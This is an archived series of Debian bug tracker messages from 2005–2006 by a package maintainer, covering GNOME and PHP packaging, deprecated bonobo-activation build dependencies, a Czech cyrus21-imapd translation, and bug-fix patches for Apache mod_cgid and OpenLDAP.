On Mon, 2006-02-06 at 11:52 +0100, Max Kellermann wrote: > Package: gnome-desktop > Version: 2.12.2-2 > Tags: FTBFS > Severity: minor > > The build dependency on gnome-doc-utils does not require a specific > version. Upstream's configure however complains: > > checking for GDU_MODULE_VERSION_CHECK... configure: error: Package > requirements (gnome-doc-utils >= 0.3.2) were not met. Sure, this is what you get by mixing apples and pears. This situation cannot ever happen in testing/unstable and if you trying to backport GNOME 2.12 you have to backport whole suite and not just some parts. I will add this dependency to SVN and will get included in next upload to unstable. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#322774: ddccontrol
Hi Roberto, are you still interested in packaging ddccontrol? If not or your resources are spare, I'll make package part of Debian GNOME packaging team and upload package into unstable. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#346534: ITP: gnome-presence-applet -- GNOME presence applet for Galago
On Sun, 2006-01-08 at 18:49 +0100, Riccardo Setti wrote: > Package: wnpp > Severity: wishlist > Owner: Riccardo Setti <[EMAIL PROTECTED]> > > > * Package name: gnome-presence-applet > Version : 0.3.1 > Upstream Author : Christian Hammond <[EMAIL PROTECTED]> > * URL : http://www.galago-project.org/ > * License : GPL > Description : GNOME presence applet for Galago > * Package name: eds-feed > Version : 0.3.2 > Upstream Author : Christian Hammond <[EMAIL PROTECTED]> > * URL : http://www.galago-project.org > * License : GPL > Description : Evolution Data Server feed for Galago I think that you should name those packages so that it includes galago in it's name, f.e.: galago-presence-applet galago-eds-feed Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#325121: dropdown menus have lots of empty space
> As can be seen here: > http://krogh.cc/~jesper/gnome-dictionary-bug.png > The pull down menu in the dictionary client is blank in the top and has > a scrool-further-down thingy in the bottom. I can confirm it. I see this behaviour on my system from time to time... As I recall it, it happens when dropdown menu is close to edge of screen (ie. has lots of options). I thinks it's time for filling upstream bug. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#345313: general: after upgrade in testing many gtk grograms do not run
reassign 345313 libgtk2.0-0 2.8.9-2 retitle 345313 libgtk2.0-0: after upgrade in testing many gtk grograms do not run thank you Hi Marcin, please as first thing to do is to go read: http://www.debian.org/Bugs/Reporting After you read and understood what did you do wrong when you filled 'general' bug, please add more information. Strace of nested library (wx) is not really usefull. We need: 1. Exact versions of affected libraries (libglib2.0-0, libgtk2.0-0). 2. strace of much simpler program then amule (f.e. gmpc which you mentioned). It won't hurt if you include two straces of different gtk+ programs Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#344738: ITA: poppler - a PDF rendering library
retitle 344738 ITA: poppler - a PDF rendering library thank you I will adopt this package on behalf of GNOME team. Ondrej -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#345133: [Pkg-Cyrus-imapd-Debian-devel] Bug#345133: [l10n] Czech translation for cyrus21-imapd
Attaching version with fixed typo adreář vs. adresář. On Thu, 2005-12-29 at 10:38 +0100, Martin Šín wrote: > Package: cyrus21-imapd > Severity: wishlist > Tags: l10n, patch Díky. -- Ondrej Sury <[EMAIL PROTECTED]> # Czech translation of cyrus21-imapd templates # msgid "" msgstr "" "Project-Id-Version: cyrus21-imapd\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2005-12-10 09:48-0700\n" "PO-Revision-Date: 2005-12-29 09:37+0100\n" "Last-Translator: Martin Sin <[EMAIL PROTECTED]>\n" "Language-Team: Czech <[EMAIL PROTECTED]>\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #. Type: note #. Description #: ../cyrus21-common.templates:3 msgid "Database backends have changed!" msgstr "Backendy databĂĄze se zmÄnily!" #. Type: note #. Description #: ../cyrus21-common.templates:3 msgid "" "Comparison between /usr/lib/cyrus/cyrus-db-types.txt and /usr/lib/cyrus/" "cyrus-db-types.active shows that database backends for Cyrus IMAPd have been " "changed." msgstr "" "SrovnĂĄnĂ mezi /usr/lib/cyrus/cyrus-db-types.txt a /usr/lib/cyrus/cyrus-db-" "types.active ukĂĄzalo, Ĺže se zmÄnil backend databĂĄze pro Cyrus IMAPd." #. Type: note #. Description #: ../cyrus21-common.templates:3 msgid "" "This means that those databases for which the database backends changed " "might need to be converted manually to the new format, using the cvt_cyrusdb" "(8) utility." msgstr "" "To znamenĂĄ, Ĺže ty databĂĄze, u kterĂ˝ch se databĂĄzovĂŠ backendy zmÄnily, budou " "moĹžnĂĄ vyĹžadovat ruÄnĂ pĹevod do novĂŠho formĂĄtu utilitou cvt_cyrusdb(8)." #. Type: note #. Description #: ../cyrus21-common.templates:3 msgid "" "Please refer to /usr/share/doc/cyrus21-common/README.Debian.database for " "more information. Do not start cyrmaster until you have converted the " "databases to the new format." msgstr "" "Pro vĂce informacĂ se prosĂm podĂvejte do /usr/share/doc/cyrus21-common/" "README.Debian.database. NespouĹĄtÄjte cyrmaster, dokud nepĹevedete databĂĄze " "do novĂŠho formĂĄtu." #. Type: boolean #. Description #: ../cyrus21-common.templates:19 msgid "Remove the Cyrus spools, and user sieve scripts?" msgstr "Odstranit spool adresĂĄĹe Cyrusu a uĹživatelskĂŠ Sieve skripty?" #. Type: boolean #. Description #: ../cyrus21-common.templates:19 msgid "" "Should I remove the Cyrus mail and news spools, as well as the user's sieve " "scripts, when the package is purged ?" msgstr "" "MĂĄm pĹi odstranÄnĂ balĂÄku smazat spool adresĂĄĹ s poĹĄtou, news pĹĂspÄvky a " "takĂŠ uĹživatelskĂŠ filtrovacĂ skripty v jazyce Sieve?" #. Type: boolean #. Description #: ../cyrus21-common.templates:19 msgid "" "This question only applies to the default spools and sieve script " "directories in /var. If you modified their location in imapd.conf, the new " "locations will not be removed; just the old ones in /var." msgstr "" "Tato otĂĄzka se tĂ˝kĂĄ pouze vĂ˝chozĂch spool adresĂĄĹĹŻ a Sieve skriptĹŻ ve /var. " "PĹi zmÄnÄ jejich umĂstÄnĂ v imapd.conf nebude odstranÄno jejich novĂŠ " "umĂstÄnĂ, ale pouze jejich starĂŠ ve /var." signature.asc Description: This is a digitally signed message part
Bug#341420: [php-maint] Bug#341420: time to include dbase extension as a part of the main php5 packages?
On Wed, 2005-11-30 at 14:54 +0100, florent GIRAUD wrote: > There is no restriction for non commercial use any more. What about > integrating it in the php5 package? Could you please raise it on [EMAIL PROTECTED] or contact upstream author for clarification? Fact that non-comercial license disapperead from PECL distributed files could not be same as upstream license change. Or if you can point us to more reliable source (upstream site?) of information... I would rather double check licensing than run into some nasty issue later. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#321933: php-mcrypt-5.0.5 package available
Hi Allard, I would be happy to sponsor your package, if you are willing to take care of bugs in it. Just send me location of your package and I will check it and then possibly upload it to archive. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#344137: [php-maint] Bug#344137: Why is GMP not included?
On Tue, 2005-12-20 at 12:00 +0100, Christian Hammers wrote: > Package: php5-common > Version: 5.0.5-3 > Severity: wishlist > > Hello > > I'm missing the GMP (big number math) module in PHP5. bcmath is > included but judging from the docs, gmp seems to have much more > functions. > > If you excluded GMP due to too many bugs, lack of upstream support > etc, see this as a wishlist bug to either document this fact or > leave it tagged as wontfix for other users who wonder why :-) Hi Christian, as I see it, it's more fact that phpX has already too many modules enabled which we need to care of (and they are full of bugs). So what we currently recommend is to go the way of php-imap source package which builds modules for php4 and php5 itself as standalone package and thus allowing to distribute care of phpX packages to more debian developers (Hint hint :-). Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#282470: nsd: [PATCH] Support running multiple instances
package nsd tags 282470 +wontfix thank you Hello Tommi, I had quick discussion with upstream authors and we came to agreement, that people who wants to run multiple instances of nsd are already able to do so and for others it would just complicate deploying nsd. There are too many posibilities (consider each instance running in separate chroot environment) which you cannot cover by single debian package, so I decided to use KISS principle and I am not going to add your patch to nsd package. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#282470: nsd: [PATCH] Support running multiple instances
Hi, would you be willing to rewrite your patch for new 2.3.3-1 release? nsdc has changed for sure between 2.1.x and 2.3.x I am also speaking to upstream about your wish, so maybe it will get included into upstream (or some other implementation of same idea). Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#341532: ITP: mozilla-thunderbird-locale-cs -- Mozilla Thunderbird Czech Language/Region Package
Package: wnpp Severity: wishlist Owner: "Ondrej Sury" <[EMAIL PROTECTED]> * Package name: mozilla-thunderbird-locale-cs Version : 1.07debian Upstream Author : Czilla Team <[EMAIL PROTECTED]> * URL : http://www.czilla.org/ * License : Mozilla Public License 1.1 Description : Mozilla Thunderbird Czech Language/Region Package Czech Menu/Message resource an Region property package for Mozilla Thunderbird. . Homepage: http://www.czilla.org Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12-10-686 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) (ignored: LC_ALL set to C) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#332929: gyrus: email of an upstream author in copyright file is wrong. please check the AUTHORS file.
Your bug report has two problems: 1. content of bug report is only in subject - it wouldn't hurt you to fill in information in body of this report, you could also include content of AUTHORS file 2. severity is wrong, use reportbug if you are unsure which severity to choose normal - a bug that does not undermine the usability of the whole package; for example, a problem with a particular option or menu item. minor - things like spelling mistakes and other minor cosmetic errors that do not affect the core functionality of the package. You should have used `minor' severity, also `wishlist' would qualify as well. Please try to report bug in correct way, it will help your bug reports to be taken seriously. Ondrej. P.S.: I will correct this with new upstream release or new upload which fixes some serious bug(s). On Sun, 2005-10-09 at 17:16 +0200, Claudio Saavedra wrote: > Package: gyrus > Version: 0.3.5-1 > Severity: normal > > > -- System Information: > Debian Release: testing/unstable > APT prefers unstable > APT policy: (500, 'unstable') > Architecture: i386 (i686) > Shell: /bin/sh linked to /bin/bash > Kernel: Linux 2.6.12-1-686 > Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) > > Versions of packages gyrus depends on: > ii libart-2.0-2 2.3.17-1 Library of functions for 2D > graphi > ii libatk1.0-0 1.10.3-1 The ATK accessibility toolkit > ii libbonobo2-0 2.10.1-1 Bonobo CORBA interfaces library > ii libbonoboui2-02.10.1-1 The Bonobo UI library > ii libc6 2.3.5-6GNU C Library: Shared libraries > an > ii libgconf2-4 2.10.1-6 GNOME configuration database > syste > ii libglade2-0 1:2.5.1-2 library to load .glade files at > ru > ii libglib2.0-0 2.8.3-1The GLib library of C routines > ii libgnet2.0-0 2.0.7-1GNet network library > ii libgnome2-0 2.10.1-1 The GNOME 2 library - runtime > file > ii libgnomecanvas2-0 2.10.2-2 A powerful object-oriented > display > ii libgnomeprint2.2-02.10.3-3 The GNOME 2.2 print architecture > - > ii libgnomeprintui2.2-0 2.10.2-2 GNOME 2.2 print architecture > User > ii libgnomeui-0 2.10.1-1 The GNOME 2 libraries (User > Interf > ii libgnomevfs2-02.10.1-5 The GNOME virtual file-system > libr > ii libgtk2.0-0 2.6.10-1 The GTK+ graphical user > interface > ii libice6 6.8.2.dfsg.1-8 Inter-Client Exchange library > ii liborbit2 1:2.12.2-3 libraries for ORBit2 - a CORBA > ORB > ii libpango1.0-0 1.8.2-3Layout and rendering of > internatio > ii libpopt0 1.7-5 lib for parsing cmdline > parameters > ii libsm66.8.2.dfsg.1-8 X Window System Session > Management > ii libxml2 2.6.22-1 GNOME XML library > ii xlibs 6.8.2.dfsg.1-8 X Window System client libraries > m > ii zlib1g1:1.2.3-4 compression library - runtime > > gyrus recommends no packages. > > -- no debconf information > -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332810: remove libbonobo-activation-dev as build dependency
On Sat, 2005-10-08 at 20:46 +0200, Loïc Minier wrote: > Hi, > > On Sat, Oct 08, 2005, Ondrej Sury wrote: > > libbonobo-activation-dev is deprecated and will be removed from archive. > > Please update build-dependency and remove libbonobo-activation-dev as > > build-dependency > > Please confirm: > The build-dep just needs to be removed, and the newer libbonobo will > work as the previous combination of libbonobo + activation without any > required update? According to #debian-gtk-gnome libbonobo-activation functionality was merged into libbonobo(ui). mozilla-bonobo is not linked to libbonobo-activation neither in stable nor unstable. Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#330677: Please remove bonobo-activation from unstable
On Sat, 2005-10-08 at 19:41 +0200, Jeroen van Wolffelaar wrote: > tags 330677 moreinfo > thanks > > On Fri, Sep 30, 2005 at 09:22:06AM +0200, Ondrej Sury wrote: > > bonobo-activation is deprecated and no package in unstable currently > > depends on it. > > ** drivel has an unsatisfied build-dependency: bonobo-activation > ** gnome-pilot has an unsatisfied build-dependency: bonobo-activation > ** mail-notification has an unsatisfied build-dependency: > libbonobo-activation-dev (>= 2.4.0) > ** mozilla-bonobo has an unsatisfied build-dependency: > libbonobo-activation-dev > ** sodipodi has an unsatisfied build-dependency: libbonobo-activation-dev > ** teg has an unsatisfied build-dependency: libbonobo-activation-dev > Did you file bugs on those reverse build-dependencies? I did. #332808-#332813 Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332813: remove libbonobo-activation-dev as build dependency
Package: mail-notification Version: 2.0-1 Severity: important Justification: bonobo-activation is deprecated as build-depend libbonobo-activation-dev is deprecated and will be removed from archive. Please update build-dependency and remove libbonobo-activation-dev as build-dependency -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332812: remove libbonobo-activation-dev as build dependency
Package: teg Version: 0.11.1-1 Severity: important Justification: bonobo-activation is deprecated as build-depend libbonobo-activation-dev is deprecated and will be removed from archive. Please update build-dependency and remove libbonobo-activation-dev as build-dependency -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332811: remove libbonobo-activation-dev as build dependency
Package: sodipodi Version: 0.34-2 Severity: important Justification: bonobo-activation is deprecated as build-depend libbonobo-activation-dev is deprecated and will be removed from archive. Please update build-dependency and remove libbonobo-activation-dev as build-dependency -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332810: remove libbonobo-activation-dev as build dependency
Package: mozilla-bonobo Version: 0.4.1-5 Severity: important Justification: bonobo-activation is deprecated as build-depend libbonobo-activation-dev is deprecated and will be removed from archive. Please update build-dependency and remove libbonobo-activation-dev as build-dependency -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332809: remove bonobo-activation as build dependency
Package: drivel Version: 2.0.2-1 Severity: important Justification: bonobo-activation is deprecated as build-depend bonobo-activation is deprecated and will be removed from archive. Please update build-dependency and remove bonobo-activation -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#332808: remove bonobo-activation as build dependency
Package: gnome-pilot Version: 2.0.12-1.4 Severity: important Justification: bonobo-activation is deprecated as build-depend bonobo-activation is deprecated and will be removed from archive. Please update build-dependency and remove bonobo-activation -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#330677: Please remove bonobo-activation from unstable
On Sat, 2005-10-08 at 19:41 +0200, Jeroen van Wolffelaar wrote: > tags 330677 moreinfo > thanks > > On Fri, Sep 30, 2005 at 09:22:06AM +0200, Ondrej Sury wrote: > > bonobo-activation is deprecated and no package in unstable currently > > depends on it. > > ** drivel has an unsatisfied build-dependency: bonobo-activation > ** gnome-pilot has an unsatisfied build-dependency: bonobo-activation > ** mail-notification has an unsatisfied build-dependency: > libbonobo-activation-dev (>= 2.4.0) > ** mozilla-bonobo has an unsatisfied build-dependency: > libbonobo-activation-dev > ** sodipodi has an unsatisfied build-dependency: libbonobo-activation-dev > ** teg has an unsatisfied build-dependency: libbonobo-activation-dev > > Did you file bugs on those reverse build-dependencies? No, since I didn't know how to reverse check build-dependencies... Will do that, since those b-d are obsolete as well... Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#330677: Please remove bonobo-activation from unstable
reopen 330677 retitle 330677 please remove bonobo-activation from unstable reassign 330677 ftp.debian.org thank you bonobo-activation is deprecated and no package in unstable currently depends on it. Ondrej -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#329799: [php-maint] Bug#329799: php4-pear: Segfault when doing pear upgrade-all
On Fri, 2005-09-23 at 15:55 +0200, Nicholas Fechner wrote: > Adam Conrad wrote: > > Nicholas Fechner wrote: > > > >>But when I try to do " pear -vvv upgrade-all" I get a segfault: > >> > >>If you need more information, let me know. > > > > > > A gdb backtrace of the segfault might be helpful. > > > > ... Adam > Hi, > how do I do that? Run: # gdb /usr/bin/php gdb> run -C -q -d include_path=/usr/share/php -d output_buffering=1 /usr/share/php/pearcmd.php -vvv upgrade-all after it crashes run: gdb> bt Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#323785: cgid segfaults when module set suexec uid and gid
reassign 323785 apache2 tags 323785 +upstream patch thank you -- Ondrej Sury <[EMAIL PROTECTED]> Index: modules/generators/mod_cgid.c === --- modules/generators/mod_cgid.c (revision 264790) +++ modules/generators/mod_cgid.c (working copy) @@ -90,10 +90,20 @@ static int daemon_should_exit = 0; static server_rec *root_server = NULL; static apr_pool_t *root_pool = NULL; +static ap_unix_identity_t empty_ugid = { (uid_t)-1, (gid_t)-1, -1 }; /* Read and discard the data in the brigade produced by a CGI script */ static void discard_script_output(apr_bucket_brigade *bb); +/* This doer will only ever be called when we are sure that we have + * a valid ugid. + */ +static ap_unix_identity_t *cgid_suexec_id_doer(const request_rec *r) +{ + return (ap_unix_identity_t *) + ap_get_module_config(r->request_config, &cgid_module); +} + /* KLUDGE --- for back-combatibility, we don't have to check ExecCGI * in ScriptAliased directories, which means we need to know if this * request came through ScriptAlias or not... so the Alias module @@ -156,15 +166,12 @@ * process to be cleaned up */ int core_module_index; -int have_suexec; -int suexec_module_index; -suexec_config_t suexec_cfg; int env_count; +ap_unix_identity_t ugid; apr_size_t filename_len; apr_size_t argv0_len; apr_size_t uri_len; apr_size_t args_len; -apr_size_t mod_userdir_user_len; int loglevel; /* to stuff in server_rec */ } cgid_req_t; @@ -316,10 +323,9 @@ cgid_req_t *req) { int i; -char *user; char **environ; -core_dir_config *temp_core; -void **dconf; +core_request_config *temp_core; +void **rconf; apr_status_t stat; r->server = apr_pcalloc(r->pool, sizeof(server_rec)); @@ -336,17 +342,13 @@ } /* handle module indexes and such */ -dconf = (void **) apr_pcalloc(r->pool, sizeof(void *) * (total_modules + DYNAMIC_MODULE_LIMIT)); +rconf = (void **) apr_pcalloc(r->pool, sizeof(void *) * (total_modules + DYNAMIC_MODULE_LIMIT)); -temp_core = (core_dir_config *)apr_palloc(r->pool, sizeof(core_module)); -dconf[req->core_module_index] = (void *)temp_core; - -if (req->have_suexec) { -dconf[req->suexec_module_index] = &req->suexec_cfg; -} - -r->per_dir_config = (ap_conf_vector_t *)dconf; - +temp_core = (core_request_config *)apr_palloc(r->pool, sizeof(core_module)); +rconf[req->core_module_index] = (void *)temp_core; +r->request_config = (ap_conf_vector_t *)rconf; +ap_set_module_config(r->request_config, &cgid_module, (void *)&req->ugid); + /* Read the filename, argv0, uri, and args */ r->filename = apr_pcalloc(r->pool, req->filename_len + 1); *argv0 = apr_pcalloc(r->pool, req->argv0_len + 1); @@ -379,19 +381,6 @@ } *env = environ; -/* basic notes table to avoid segfaults */ -r->notes = apr_table_make(r->pool, 1); - -/* mod_userdir requires the mod_userdir_user note */ -if (req->mod_userdir_user_len) { -user = apr_pcalloc(r->pool, req->mod_userdir_user_len + 1); /* last byte is '\0' */ -stat = sock_read(fd, user, req->mod_userdir_user_len); -if (stat != APR_SUCCESS) { -return stat; -} -apr_table_set(r->notes, "mod_userdir_user", (const char *)user); -} - #if 0 #ifdef RLIMIT_CPU sock_read(fd, &j, sizeof(int)); @@ -434,22 +423,19 @@ int req_type) { int i; -const char *user; -module *suexec_mod = ap_find_linked_module("mod_suexec.c"); cgid_req_t req = {0}; -suexec_config_t *suexec_cfg; apr_status_t stat; +ap_unix_identity_t * ugid = ap_run_get_suexec_identity(r); +if (ugid == NULL) { +req.ugid = empty_ugid; +} else { +memcpy(&req.ugid, ugid, sizeof(ap_unix_identity_t)); +} + req.req_type = req_type; req.conn_id = r->connection->id; req.core_module_index = core_module.module_index; -if (suexec_mod) { -req.have_suexec = 1; -req.suexec_module_index = suexec_mod->module_index; -suexec_cfg = ap_get_module_config(r->per_dir_config, - suexec_mod); -req.suexec_cfg = *suexec_cfg; -} for (req.env_count = 0; env[req.env_count]; req.env_count++) { continue; } @@ -457,10 +443,6 @@ req.argv0_len = strlen(argv0); req.uri_len = strlen(r->uri); req.args_len = r->args ? strlen(r->args) : 0; -user = (const char *)apr_table_get(r->notes, "mod_userdir_user"); -if (user != NULL) { -req.mod_userdir_use
Bug#329065: [php-maint] Bug#329065: php5-sybase: sybase_ct doesn't always return correct results from MS SQL
On Mon, 2005-09-19 at 14:07 +0200, Johan Palmqvist wrote: > > Adam Conrad wrote: > > severity 329065 important > > thanks > > > > Johan Palmqvist wrote: > > > > > Severity: grave > > > Justification: causes non-serious data loss > > > > > > > How does this cause data loss and warrant a grave bug? > > > > > PHP code for a test case is attached. The executed stored procedure > returns a string containing a URL. The only modifications to php.ini > are specified below. Thanks for that test case. Just a quick explanation what "data loss" mean (at least to us). To mark this bug as grave because of "data loss" it would have to delete affected data from database. I know that this is annoying bug (at least for you) and we will work with upstream to resolve it, but it's not "grave" bug, because you are using very rare setup (php on linux with MSSQL) and it doesn't happen on all occasions. O. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#329076: Patch to fix segfault when setting Timeout value twice
Package: openldap2 Version: 2.1.30-8 Severity: important Please apply this backported (attached) patch from REL_2.2, it fixes crashes when you set timeout value twice, which can happen quite easily. Upstream ITS: http://www.openldap.org/its/index.cgi/Software% 20Bugs?id=3487;expression=TIMEOUT;casesensitive=1;usearchives=1;statetype=-1 Reason why we need it for apache2 mod_ldap: http://issues.apache.org/bugzilla/show_bug.cgi?id=34618#c12 We will then depend our apache2 builds on library with this fix included. Thanks, -- Ondrej Sury <[EMAIL PROTECTED]> diff -urN openldap2-2.1.30~/libraries/libldap/open.c openldap2-2.1.30/libraries/libldap/open.c --- openldap2-2.1.30~/libraries/libldap/open.c 2003-04-29 01:41:55.0 +0200 +++ openldap2-2.1.30/libraries/libldap/open.c 2005-09-19 14:06:12.0 +0200 @@ -126,6 +126,9 @@ /* but not pointers to malloc'ed items */ ld->ld_options.ldo_sctrls = NULL; ld->ld_options.ldo_cctrls = NULL; + ld->ld_options.ldo_tm_api = NULL; + ld->ld_options.ldo_tm_net = NULL; + ld->ld_options.ldo_defludp = NULL; #ifdef HAVE_CYRUS_SASL ld->ld_options.ldo_def_sasl_mech = gopts->ldo_def_sasl_mech @@ -138,30 +141,43 @@ ? LDAP_STRDUP( gopts->ldo_def_sasl_authzid ) : NULL; #endif - ld->ld_options.ldo_defludp = ldap_url_duplist(gopts->ldo_defludp); + if ( gopts->ldo_tm_api && + ldap_int_timeval_dup( &ld->ld_options.ldo_tm_api, gopts->ldo_tm_api )) + goto nomem; - if ( ld->ld_options.ldo_defludp == NULL ) { - LDAP_FREE( (char*)ld ); - return LDAP_NO_MEMORY; - } + if ( gopts->ldo_tm_net && + ldap_int_timeval_dup( &ld->ld_options.ldo_tm_net, gopts->ldo_tm_net )) + goto nomem; + + if ( gopts->ldo_defludp ) { + ld->ld_options.ldo_defludp = ldap_url_duplist(gopts->ldo_defludp); - if (( ld->ld_selectinfo = ldap_new_select_info()) == NULL ) { - ldap_free_urllist( ld->ld_options.ldo_defludp ); - LDAP_FREE( (char*) ld ); - return LDAP_NO_MEMORY; + if ( ld->ld_options.ldo_defludp == NULL ) goto nomem; } + if (( ld->ld_selectinfo = ldap_new_select_info()) == NULL ) goto nomem; + ld->ld_lberoptions = LBER_USE_DER; ld->ld_sb = ber_sockbuf_alloc( ); - if ( ld->ld_sb == NULL ) { - ldap_free_urllist( ld->ld_options.ldo_defludp ); - LDAP_FREE( (char*) ld ); - return LDAP_NO_MEMORY; - } + if ( ld->ld_sb == NULL ) goto nomem; *ldp = ld; return LDAP_SUCCESS; + +nomem: + ldap_free_select_info( ld->ld_selectinfo ); + ldap_free_urllist( ld->ld_options.ldo_defludp ); + LDAP_FREE( ld->ld_options.ldo_tm_net ); + LDAP_FREE( ld->ld_options.ldo_tm_api ); +#ifdef HAVE_CYRUS_SASL + LDAP_FREE( ld->ld_options.ldo_def_sasl_authzid ); + LDAP_FREE( ld->ld_options.ldo_def_sasl_authcid ); + LDAP_FREE( ld->ld_options.ldo_def_sasl_realm ); + LDAP_FREE( ld->ld_options.ldo_def_sasl_mech ); +#endif + LDAP_FREE( (char *)ld ); + return LDAP_NO_MEMORY; } /* signature.asc Description: This is a digitally signed message part
Bug#329065: [php-maint] Bug#329065: php5-sybase: sybase_ct doesn't always return correct results from MS SQL
severity 329065 normal thank you This is not grave bug. It happens only on interfacing MS-SQL and only on some circumstances. Ondrej On Mon, 2005-09-19 at 11:02 +0200, Johan Palmqvist wrote: > Package: php5-sybase > Version: 5.0.4-3 > Severity: grave > Justification: causes non-serious data loss > > > sybase_ct doesn't always return correct results from MS SQL. > mssql module seem to work in all cases but is not packaged. > > > -- System Information: > Debian Release: testing/unstable > APT prefers unstable > APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable') > Architecture: i386 (i686) > Shell: /bin/sh linked to /bin/bash > Kernel: Linux 2.6.12.2 > Locale: LANG=sv_SE, LC_CTYPE=sv_SE (charmap=ISO-8859-1) (ignored: LC_ALL set > to sv_SE) > > Versions of packages php5-sybase depends on: > ii debconf [debconf-2.0] 1.4.58 Debian configuration management > sy > ii libapache2-mod-php5 [phpapi-2 5.0.4-3server-side, HTML-embedded > scripti > ii libc6 2.3.5-6GNU C Library: Shared libraries > an > ii libct30.63-2 libraries for connecting to MS > SQL > ii php5-cgi [phpapi-20041030]5.0.4-3server-side, HTML-embedded > scripti > ii php5-cli [phpapi-20041030]5.0.4-3command-line interpreter for the > p > ii php5-common 5.0.4-3Common files for packages built > fr > > php5-sybase recommends no packages. > > -- debconf information: > php5/remove_extension: true > php5/add_extension: true > php5/extension_sybase_ct_cgi: true > php5/extension_sybase_ct_cli: true > php5/extension_sybase_ct_apache2: true > > > ___ > pkg-php-maint mailing list > [EMAIL PROTECTED] > http://lists.alioth.debian.org/mailman/listinfo/pkg-php-maint -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#303600: package will be created under Gnome Debian team
package wnpp retitle 303600 ITP: gnome-power-manager -- tool for user configuration of power management policies thank you I will take this package. O. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#147728: [php-maint] Bug#147728: can you explain why pspell is not enabled?
On Thu, 2005-09-01 at 19:52 +0300, Tomas Kuliavas wrote: > > On Wed, 2005-08-31 at 21:52 +0300, Tomas Kuliavas wrote: > >> You have three bugs asking to enable spell checking module with no > >> feedback from package maintainers. > > > > No, there was feedback from me: > > > > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=156733;msg=17 > > > > Are you willing to solve bugs in and maintains pspell extension? > > Prepare separate package and ask us for sponsorship. > > > > Any interested DD can do that. Any interested user can do that with DD > > sponsorship. > > I am only DU and don't have knowledge required to maintain C based program. Maintaining PHP packages is much worse then maintaining C based programs. > What kind of bugs are present in php pspell extension? Is it broken on > some architecture? I don't know if it's broken and personally I don't want to know. Apparently nobody from php team wants to maintain this extension. I filled RFH wnpp bug, maybe there is brave soul somewhere in Debian universe. O. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#147728: [php-maint] Bug#147728: can you explain why pspell is not enabled?
On Wed, 2005-08-31 at 21:52 +0300, Tomas Kuliavas wrote: > You have three bugs asking to enable spell checking module with no > feedback from package maintainers. No, there was feedback from me: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=156733;msg=17 Are you willing to solve bugs in and maintains pspell extension? Prepare separate package and ask us for sponsorship. Any interested DD can do that. Any interested user can do that with DD sponsorship. O. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#325322: New upstream version
Florian Frank wrote: Package: postfix-policyd Version: 1.55-1 Severity: wishlist New upstream version 1.66 availiable, with some really nice features. On my selfmade package merging upstream was really straight forward. I need to start using ucf and dbconfig-common since database and config changes offen and debian packages need to make upgrades smooth. Ondrej -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#324677: ITP: fruit -- Fruit is an UCI-only chess engine.
